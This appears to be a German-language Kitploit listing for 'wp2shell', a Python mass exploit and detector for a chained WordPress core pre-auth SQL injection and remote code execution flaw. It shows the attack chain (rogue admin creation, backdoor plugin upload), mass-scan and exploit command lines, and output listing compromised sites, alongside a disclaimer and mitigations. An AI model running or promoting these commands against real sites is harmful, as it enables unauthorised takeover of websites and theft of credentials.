Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-63030 — Python-Massenexploit und Detektor für die WordPress-Core-Pre-Auth-RCE-Kette CVE-2026-63030 und CVE-2026-60137, die SQL-Injection mit Remote-Code-Ausführung verkettet. | Kitploit
Tools/GitHubGitHub/fl0ydsec/cve-2026-63030
SchwachstellenscannerPasswortangriffeExploitationWebanwendungs-ExploitationPost-ExploitationWebsicherheitPenetrationstestsRed TeamingRemote-Access-ToolPayload-Entwicklung
GitHub
3vor 17h 48mNoch nicht geprüft
fl0ydsec/cve-2026-63030

CVE-2026-63030

Python-Massenexploit und Detektor für die WordPress-Core-Pre-Auth-RCE-Kette CVE-2026-63030 und CVE-2026-60137, die SQL-Injection mit Remote-Code-Ausführung verkettet.

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

WP2Shell — CVE-2026-63030 + CVE-2026-60137

WordPress Core Pre-Authentication RCE (Mass Exploit / Detektor)

CVE-2026-63030 CVE-2026-60137 CVSS WordPress Auth

Author Python Telegram


📋 Übersicht der Schwachstelle

AttributDetails
CVE-IDCVE-2026-63030 (+ CVE-2026-60137)
Kettewp2shell — Pre-Auth RCE
Schweregrad🔴 KRITISCH (CVSS 9.8)
ZielWordPress Core (ohne Plugins)
Betroffen (RCE)6.9.0 – 6.9.4 und 7.0.0 – 7.0.1
Betroffen (nur SQLi)6.8.0 – 6.8.5
Behoben6.8.6 / 6.9.5 / 7.0.2 (18.07.2026)
Erforderliche AuthentifizierungKeine

🔍 Technische Beschreibung

Zwei verkettete Schwachstellen im WordPress-Kern:

  1. CVE-2026-60137 — SQL-Injection: SQL-Injection im Parameter author__not_in der internen Klasse WP_Query.
  2. CVE-2026-63030 — REST-API-Batch-Routenverwechslung: Der Endpunkt /wp-json/batch/v1 bringt die Batch-Einträge außer Takt, wodurch eine Anfrage auf die nächste Route „fällt".

Die Kette wandelt die SQLi in eine Pre-Authentication-RCE um:

root@kitploit:~
route confusion /wp-json/batch/v1 ─► SQLi no author__not_in
        │                                    │
        └──────────────┬─────────────────────┘
                       ▼
        UNION fake-post + oEmbed + changeset poisoning
                       ▼
        POST /wp/v2/users  (roles: administrator)  ← admin criado sem auth
                       ▼
        login → upload plugin backdoor → RCE

Fallbacks: direktes INTO OUTFILE (FILE-Privileg) und blinde Hash-Extraktion + Crack.


🚀 Verwendung

root@kitploit:~
python wp2shell.py exploit -l targets.txt --cmd whoami --authorized -k -c 10 --delay 2
python wp2shell.py remote  -l targets.txt --authorized --active-probe -c 20 -f csv -o scan.csv
OptionBeschreibung
-l, --targets-fileEin Ziel pro Zeile (wiederholbar, unbegrenzt)
-u, --targetEinzelnes Ziel
--cmdBefehl, der auf dem Ziel ausgeführt werden soll
--authorizedErforderlich (oder WP2SHELL_AUTHORIZED=1)
-c, --concurrencyZiele parallel (1–32)
--delaySLEEP des Timings/der Extraktion (2 = robust)
--rateAnfragen/s pro Ziel
-k, --insecureTLS ignorieren
--proxyHTTP-Proxy
--wordlist / --password / --usernameFallback für Anmeldedaten
--log / --owned / --results-csvAusgabedateien

📊 Ausgabe

root@kitploit:~
[+] [14:22:31] https://target.com  OWNED  ✓1 ~0 ✗10
[~] [14:22:32] https://other.com   ADMIN  ✓1 ~1 ✗10

---- SUMMARY ----
[+] owned=1   [~] admin=1   [-] fail=10   [.] error=0
  • owned.txt — Ziele mit RCE (Shell-URL)
  • admins.txt — ohne RCE-Sink erstellte Admins (Anmeldedaten)
  • exploit_log.txt — Details pro Ziel
  • results.csv — Zusammenfassung (exit_code: 0=owned, 4=admin, 2=fail, 3=error)

⚙️ Funktionen

  • UNION-SQLi in-band + Timing + X-WP-Total-Oracle
  • Pre-Auth-Admin via oEmbed/Changeset-Poisoning
  • Verstecktes Login (WPS Hide Login whl_page via SQLi) + gängige Slugs
  • Plugin-Upload mit korrekten Nonce/Aktivierung + Fallback INTO OUTFILE
  • Unbegrenzte Masse, parallel pro Ziel, Deadline gegen Hängenbleiben
  • owned/admins in Echtzeit

📁 Dateistruktur

root@kitploit:~
├── wp2shell.py       # exploit + detector
├── targets.txt       # alvos (uma URL por linha)
├── owned.txt         # RCE conseguido (auto-criado)
├── admins.txt        # admins criados (auto-criado)
└── README.md

⚠️ Haftungsausschluss

root@kitploit:~
╔══════════════════════════════════════════════════════════════════╗
║                        LEGAL DISCLAIMER                          ║
╠══════════════════════════════════════════════════════════════════╣
║  This tool is provided for EDUCATIONAL and AUTHORIZED           ║
║  SECURITY TESTING purposes only.                                ║
║  Only use on systems you own or have explicit permission.       ║
║  The author is NOT responsible for any misuse or damage.        ║
╚══════════════════════════════════════════════════════════════════╝

🛡️ Gegenmaßnahmen

  1. Aktualisieren Sie auf 6.8.6 / 6.9.5 / 7.0.2 (oder höher)
  2. Blockieren Sie nicht authentifizierte POST-Anfragen an /wp-json/batch/v1 und /?rest_route=/batch/v1
  3. Prüfen Sie wp-content/uploads/ und wp-content/plugins/ auf verdächtiges PHP

👤 Autor

fl0ydsec (Floydroot)

GitHub Telegram

Security Research

Tool herunterladen